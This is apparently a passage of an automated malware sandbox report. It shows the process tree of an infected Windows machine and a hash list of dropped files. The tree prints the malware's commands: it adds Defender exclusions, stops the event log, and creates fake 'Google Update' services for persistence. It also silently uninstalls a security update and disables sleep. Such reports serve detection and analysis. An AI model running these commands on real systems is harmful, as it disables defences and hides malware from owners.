                                          • C:\Windows\winqlsdrvcs.exe
                                            C:\Windows\winqlsdrvcs.exe
                                            5⤵
                                            • Windows security bypass
                                            • Executes dropped EXE
                                            • Windows security modification
                                            PID:8160
                                            • C:\Users\Admin\AppData\Local\Temp\3759823002.exe
                                              C:\Users\Admin\AppData\Local\Temp\3759823002.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:6472
                                            • C:\Users\Admin\AppData\Local\Temp\1957614520.exe
                                              C:\Users\Admin\AppData\Local\Temp\1957614520.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:3976
                                            • C:\Users\Admin\AppData\Local\Temp\1242839626.exe
                                              C:\Users\Admin\AppData\Local\Temp\1242839626.exe
                                              6⤵
                                                PID:6444
                                          • C:\Users\Admin\AppData\Local\Temp\2930632633.exe
                                            C:\Users\Admin\AppData\Local\Temp\2930632633.exe
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1116
                                            • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:6876
                                            • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:6336
                                            • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                              5⤵
                                                PID:1836
                                            • C:\Users\Admin\AppData\Local\Temp\2203324155.exe
                                              C:\Users\Admin\AppData\Local\Temp\2203324155.exe
                                              4⤵
                                              • Executes dropped EXE
                                              PID:5560
                                              • C:\Users\Admin\AppData\Local\Temp\1194417734.exe
                                                C:\Users\Admin\AppData\Local\Temp\1194417734.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:6308
                                            • C:\Users\Admin\AppData\Local\Temp\2028115777.exe
                                              C:\Users\Admin\AppData\Local\Temp\2028115777.exe
                                              4⤵
                                              • Executes dropped EXE
                                              PID:7420
                                        • C:\Users\Admin\AppData\Local\Temp\a\print.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\print.exe"
                                          2⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1368
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:7172
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1352
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1456
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5472
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                            3⤵
                                            • Launches sc.exe
                                            PID:7396
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                            3⤵
                                            • Launches sc.exe
                                            PID:5036
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop eventlog
                                            3⤵
                                            • Launches sc.exe
                                            PID:5148
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                            3⤵
                                            • Launches sc.exe
                                            PID:6808
                                        • C:\Users\Admin\AppData\Local\Temp\a\222.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\222.exe"
                                          2⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:5708
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                            3⤵
                                              PID:5392
                                              • C:\Windows\system32\mode.com
                                                mode 65,10
                                                4⤵
                                                  PID:6080
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e file.zip -p209313910271864811381312692 -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:7636
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_8.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5060
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_7.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:7316
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_6.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5848
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_5.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6980
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_4.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:5704
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_3.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:7480
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_2.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:60
                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                  7z.exe e extracted/file_1.zip -oextracted
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:2776
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +H "Installer.exe"
                                                  4⤵
                                                  • Views/modifies file attributes
                                                  PID:1844
                                                • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
                                                  "Installer.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Drops file in System32 directory
                                                  PID:7796
                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:5412
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    5⤵
                                                      PID:2932
                                                      • C:\Windows\system32\wusa.exe
                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                        6⤵
                                                          PID:8072
                                                      • C:\Windows\system32\powercfg.exe
                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        5⤵
                                                          PID:5904
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                          5⤵
                                                            PID:7504
                                                          • C:\Windows\system32\powercfg.exe
                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            5⤵
                                                              PID:8024
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              5⤵
                                                                PID:5332
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe delete "OARKQOLE"
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:7268
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:5252
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:7840
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe start "OARKQOLE"
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:3144
                                                        • C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"
                                                          2⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Modifies registry class
                                                          PID:7272
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
                                                            3⤵
                                                            • Checks computer location settings
                                                            PID:7408
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
                                                              4⤵
                                                                PID:6368
                                                                • C:\Windows\system32\reg.exe
                                                                  C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
                                                                  5⤵
                                                                    PID:2516
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    find /i "Windows 7"
                                                                    5⤵
                                                                      PID:5172
                                                              • C:\Users\Admin\AppData\Local\Temp\a\client.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                PID:1312
                                                                • C:\Windows\system32\Client.exe
                                                                  "C:\Windows\system32\Client.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:824
                                                              • C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5956
                                                              • C:\Users\Admin\AppData\Local\Temp\a\64.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\a\64.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:8076
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd
                                                                  3⤵
                                                                    PID:6516
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:7352
                                                                • C:\ProgramData\Google\Chrome\updater.exe
                                                                  C:\ProgramData\Google\Chrome\updater.exe
                                                                  1⤵
                                                                  • Drops file in Drivers directory
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:6084
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:6428
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:7564
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1020
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:928
                                                                  • C:\Windows\system32\conhost.exe
                                                                    C:\Windows\system32\conhost.exe
                                                                    2⤵
                                                                      PID:4300
                                                                    • C:\Windows\system32\conhost.exe
                                                                      conhost.exe
                                                                      2⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2524
                                                                  • C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
                                                                    C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:7000
                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                      2⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:4908
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                      2⤵
                                                                        PID:4640
                                                                        • C:\Windows\system32\wusa.exe
                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                          3⤵
                                                                            PID:1388
                                                                        • C:\Windows\system32\powercfg.exe
                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                          2⤵
                                                                            PID:6872
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                            2⤵
                                                                              PID:2936
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              2⤵
                                                                                PID:5440
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                2⤵
                                                                                  PID:7916
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  C:\Windows\system32\conhost.exe
                                                                                  2⤵
                                                                                    PID:2696
                                                                                  • C:\Windows\explorer.exe
                                                                                    explorer.exe
                                                                                    2⤵
                                                                                      PID:3316

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\ProgramData\ICodecLibrary 1.22.66\ICodecLibrary 1.22.66.exe

                                                                                    Filesize

                                                                                    2.2MB

                                                                                    MD5

                                                                                    8358f1dd3fc6a236434e9eff45f1a2d8

                                                                                    SHA1

                                                                                    7a0007ca44015af841015f0775752fede3c167e1

                                                                                    SHA256

                                                                                    1f4436584109c2fd0240f92a4d978c6ec021268505515f1e4cf27938db53e849

                                                                                    SHA512

                                                                                    477325120bcdc745bab552eef142100d12d6c46679b979773e938d79c528cc4b2de6412ac621a2d8d0773d3d35663e1e0950deb9b4183fcf783fc6273918f7e7

                                                                                  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                    Filesize

                                                                                    36KB

                                                                                    MD5

                                                                                    b30d3becc8731792523d599d949e63f5

                                                                                    SHA1

                                                                                    19350257e42d7aee17fb3bf139a9d3adb330fad4

                                                                                    SHA256

                                                                                    b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                                                                                    SHA512

                                                                                    523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                                                                                  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                    Filesize

                                                                                    56KB

                                                                                    MD5

                                                                                    752a1f26b18748311b691c7d8fc20633

                                                                                    SHA1

                                                                                    c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                                                                    SHA256

                                                                                    111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                                                                    SHA512

                                                                                    a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                                                                  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                    Filesize

                                                                                    64KB

                                                                                    MD5

                                                                                    b2b9fa64f132caab9f75646ceba8b561

                                                                                    SHA1

                                                                                    0ad18c8d392af77674683e967cb50c6abf7547a4

                                                                                    SHA256

                                                                                    0530ced1bc5a3c6f729e5c23949ea326c906a87d8a4c022880a9cceafa625ed3

                                                                                    SHA512

                                                                                    a9af39df8fa6b2753b486eb85cd5112717b40df7ae40f164c36ae12850ff19680584bf158c6211e7218763a4375892b1b81d02fd99c1b5f50fe911f3f825f2d7

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1397330615.exe

                                                                                    Filesize

                                                                                    8KB

                                                                                    MD5

                                                                                    11d2f27fb4f0c424ab696573e79db18c

                                                                                    SHA1

                                                                                    d08ece21a657bfa6ea4d2db9b21fbb960d7f4331

                                                                                    SHA256

                                                                                    dee9dca027009b7d2885ace7b968d2e9505a41b34756b08343338f8ef259e9be

                                                                                    SHA512

                                                                                    a60de41caa6113430ab4ab944b800579f574f9b964c362f9c62bbfc1bd85dccd01b628809367e15cfe6baaba32c1255f8db07e434ff7bcf5e90d9b3d1f6a4cd4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\624913175.exe

                                                                                    Filesize

                                                                                    10KB

                                                                                    MD5

                                                                                    47340d40e7f73e62cf09ac60fd16ad68

                                                                                    SHA1

                                                                                    effd38f6561155802d3e5090f5714589eae5ce6e

                                                                                    SHA256

                                                                                    e8a0c46342abd882318dbfdb17b7d3cb93d7138564878a15c5b91229ed81689c

                                                                                    SHA512

                                                                                    2d5fbacad67eba3c42c2be95c3bf64d787d15cf96d5afe827d6f9bdb175295859e684202ff5afc773202f4b9d0b3135e913c997bbe72026cd7a7ca96ecf5aa08

                                                                                  • C:\Users\Admin\AppData\Local\Temp\78427805.exe

                                                                                    Filesize

                                                                                    11KB

                                                                                    MD5

                                                                                    cafd277c4132f5d0f202e7ea07a27d5c

                                                                                    SHA1

                                                                                    72c8c16a94cce56a3e01d91bc1276dafc65b351d

                                                                                    SHA256

                                                                                    e5162fa594811f0f01fc76f4acbd9fe99b2265df9cfcbc346023f28775c19f1e

                                                                                    SHA512

                                                                                    7c87d1dec61b78e0f223e8f9fec019d96509813fa6d96129289aab00b2d6f05bf91fe1fafd680b7d9e746f4c2c8cbe48a3028bcaad479048d00d79a19f71b196

                                                                                  • C:\Users\Admin\AppData\Local\Temp\94d74276

                                                                                    Filesize

                                                                                    1.7MB

                                                                                    MD5

                                                                                    3db39aa30df77ddcb2e5b50998a869f4

                                                                                    SHA1

                                                                                    fcfaa9cadaf8332aa6eb4c438036ff17a2899cc9

                                                                                    SHA256

                                                                                    57387226ddda11faf8909e4edd47ae3d4edac978c035308ba63a5686e580e52a

                                                                                    SHA512

                                                                                    596e9833febcdb4c1e84d79258cb305618a252f35d4760be7be695c7abe4ee014b085a7afc33fc6252f0c93affcc8ca405915b8942bd41e736c3a3cf3ab48ea9

                                                                                  • C:\Users\Admin\AppData\Local\Temp\980ecfb9

                                                                                    Filesize

                                                                                    1.7MB

                                                                                    MD5

                                                                                    da84c402828c4df624760c06f6f9a7c4

                                                                                    SHA1

                                                                                    a7cde7fe8651bf0bbfb71921b7f866422e5d3f1d

                                                                                    SHA256

                                                                                    f4d62ab6e1676caaa9c3442973236b1cf0ba17d9b5ca414e50281e0a8db06ba0

                                                                                    SHA512

                                                                                    8be83dcb532621bdc702e3a55625b52a7051df9235203dc315381aa80796445a80f452a24b8ea9cd20675d67866238245ca5df9f24976d1e988fbcddd916d32c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    a407c54a89a1dc65074b2f09b8664f34

                                                                                    SHA1

                                                                                    b7d984e56575de4fe305e3b2b386f20810e69953

                                                                                    SHA256

                                                                                    938d9f85529b66633c6174ebc191774836d5627ca00522934ce67d893f2078f0

                                                                                    SHA512

                                                                                    7cad8abee45167e807c2ee399e8ea0287be5686853a20ea929b4ae9a2229bc11623ef3087c58355d124dd2841a5e7afd852fc746041bd5e3b5fe787326509da6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\FUT.au3

                                                                                    Filesize

                                                                                    872KB

                                                                                    MD5

                                                                                    c56b5f0201a3b3de53e561fe76912bfd

                                                                                    SHA1

                                                                                    2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                    SHA256

                                                                                    237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                    SHA512

                                                                                    195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

                                                                                    Filesize

                                                                                    742KB

                                                                                    MD5

                                                                                    544cd51a596619b78e9b54b70088307d

                                                                                    SHA1

                                                                                    4769ddd2dbc1dc44b758964ed0bd231b85880b65

                                                                                    SHA256

                                                                                    dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

                                                                                    SHA512

                                                                                    f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\slwga.dll

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    788a402d0fcc43662ba8b73c85c63c7f

                                                                                    SHA1

                                                                                    d5cec0d57a7516db6cdecbdc3d335db24444037b

                                                                                    SHA256

                                                                                    79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60

                                                                                    SHA512

                                                                                    8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\sppwmi.dll

                                                                                    Filesize

                                                                                    116KB

                                                                                    MD5

                                                                                    bad4c7c3c11d8bd6b7f81887cb3cac5f

                                                                                    SHA1

                                                                                    80e23c13e67e6af29a2deb31a643148e69887c53

                                                                                    SHA256

                                                                                    a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4

                                                                                    SHA512

                                                                                    27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\winver.dll

                                                                                    Filesize

                                                                                    12KB

                                                                                    MD5

                                                                                    161a5f076af5f6268665ebbcf53a4937

                                                                                    SHA1

                                                                                    1cab495c456d4d7dfc936a13b800884af8554704

                                                                                    SHA256

                                                                                    62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55

                                                                                    SHA512

                                                                                    ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35

                                                                                  • C:\Users\Admin\AppData\Local\Temp\SIG.EXE

                                                                                    Filesize

                                                                                    3.4MB

                                                                                    MD5

                                                                                    64fb7bebeb2e58cdeef83cc42f624f1b

                                                                                    SHA1

                                                                                    242307f03a7d9dc7c76737246d710bf10efe998f

                                                                                    SHA256

                                                                                    0965f85212e3c5fc2cd3e14499fd65b90c5aac7029a3d0afd61525284c5dc88f

                                                                                    SHA512

                                                                                    ec21a3064b68dd87a13e5128cc279ed3ea92c3aa26b245aaf7211ba3cf5bf32c71476b679d0c7a9b94035e18bdb9dea1fe8eb053f7c30d791a026ba4e5398cec

                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0z2zk0rq.csa.ps1

                                                                                    Filesize

                                                                                    60B

                                                                                    MD5

                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                    SHA1

                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                    SHA256

                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                    SHA512

                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\222.exe

                                                                                    Filesize

                                                                                    6.5MB

                                                                                    MD5

                                                                                    0603ce41d19c5ed6f06d28d7c1a0d8fe

                                                                                    SHA1

                                                                                    f6851bbba9127c624fb8e9993f747275bfd5e2eb

                                                                                    SHA256

                                                                                    63ce5a5c895df81cf05bd0d93f568f5d0f0008bb02c47fa0ce19af76c724cc1d

                                                                                    SHA512

                                                                                    2c483c352d4e9eca8f8db546e2a7014477709c320f779b24ae928bc78889ef16c784f96a9686d2d33a393dfb967aceb757dc3b2e39c708357233112d6ce02119

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\64.exe

                                                                                    Filesize

                                                                                    7KB

                                                                                    MD5

                                                                                    e1517885f6c71f7b3dafa6d4610c4762

                                                                                    SHA1

                                                                                    01edbfd0a59d9addad0f30c5777351c484c1fcd1

                                                                                    SHA256

                                                                                    4456f9a5d25296d8e6e184d50ec5355f01848263ce32e8379120a1077194a5ba

                                                                                    SHA512

                                                                                    4c947836d668dac764f0945c3438a0e1aae6c647560907a96096a6af9795a4b753f1c138e526d06029d364a28e900cbca07566c56df14764d232e3bacbca6c93

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe

                                                                                    Filesize

                                                                                    436KB

                                                                                    MD5

                                                                                    46fc9e5e1fbeed55281cd5f25310f8d3

                                                                                    SHA1

                                                                                    be6bb9f76a2545781a628690602eab704ce1e64b

                                                                                    SHA256

                                                                                    0494a21fd6ec0405206dbe6c82525b895f09ff4c240a301e1baae682c5ad80a2

                                                                                    SHA512

                                                                                    c7b3a65f50a6e0bffea72a215fa717378c93d767d287c711912dda55dff6294bd2266a502cfe80aea4c6bdaae03170bd5b50bdcc175bcd146c6a79ed7bee0b5b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe

                                                                                    Filesize

                                                                                    2.1MB

                                                                                    MD5

                                                                                    b6cc199e11c8173382c129c7580d1160

                                                                                    SHA1

                                                                                    218a3fe633e91585891f5533e980345b0b36edf1

                                                                                    SHA256

                                                                                    8a2d24173df00f8af5787df985d10c4b678c800eebb40eb0be876e2ace647b10

                                                                                    SHA512

                                                                                    116862fb184e8229e8ac6310e24809e900ed0273c56dec36fa0c77ec660631ce4e9616b650dfce655b9dc375e6ff7644abeebaa2c65a8fb1f4297e77135834dd

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

                                                                                    Filesize

                                                                                    5.0MB

                                                                                    MD5

                                                                                    a4e84bdb6fba7b3c5689b0f2bc5ec858

                                                                                    SHA1

                                                                                    6ef4aaf5a594b23cb64e168824b1fc2376cf6c5e

                                                                                    SHA256

                                                                                    48605846c229a73a9695d0a6567982bb558e5108b2251b74ad2cdba66e332632

                                                                                    SHA512

                                                                                    c2241abab28b6d31f33fb17b89983fbfdfe03d55ca1078e8de29e4b56328ed5933c577c0e0865d8edcf897b9d752e8a011a22297f9d87cb683ce9f0522f763ea

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\alabi.exe

                                                                                    Filesize

                                                                                    435KB

                                                                                    MD5

                                                                                    794a7bc49c07d085d9e3cd15515f961d

                                                                                    SHA1

                                                                                    ba3c257dc49a4fef8f59465b179b505db096fe33

                                                                                    SHA256

                                                                                    3ba0f4f8645247e4f440e38ca2b0f91bed5d239452e97054e75e25d371ec4d98

                                                                                    SHA512

                                                                                    6d56bbe23e395fa4839bc96e4632e6e98b2834b0a11fb34322c96f50a2b734f7a0d00f2c5b458766e389c739c3d5d03fec661038737ff6c340e3a7754a6b2f97

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\client.exe

                                                                                    Filesize

                                                                                    3.1MB

                                                                                    MD5

                                                                                    4a603ec4e3c5a21400eaabac7c6401c6

                                                                                    SHA1

                                                                                    23b446721eacd0b6796407ca20bd1e01355ab41f

                                                                                    SHA256

                                                                                    566ba756b7fc2174fc195c05d9e0a36aa706e4ce397f890488227b7d0ad4ad7c

                                                                                    SHA512

                                                                                    070a5dd14bce16ba58eb65f3b3143fc7890f0e34f2ed7f3a1930e3fa8454ebcf615b43c819f16f4fc494676443bd409a3a57e8fe6e8f39ab02df5ace497eaea0

                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\conhost.exe

                                                                                    Filesize

                                                                                    2.5MB

                                                                                    MD5

                                                                                    be320b59ef29060678bcb78d6c8fa059

                                                                                    SHA1

                                                                                    eb76091dc908c5bcf1ddd24900f53b6d9119bf53

                                                                                    SHA256

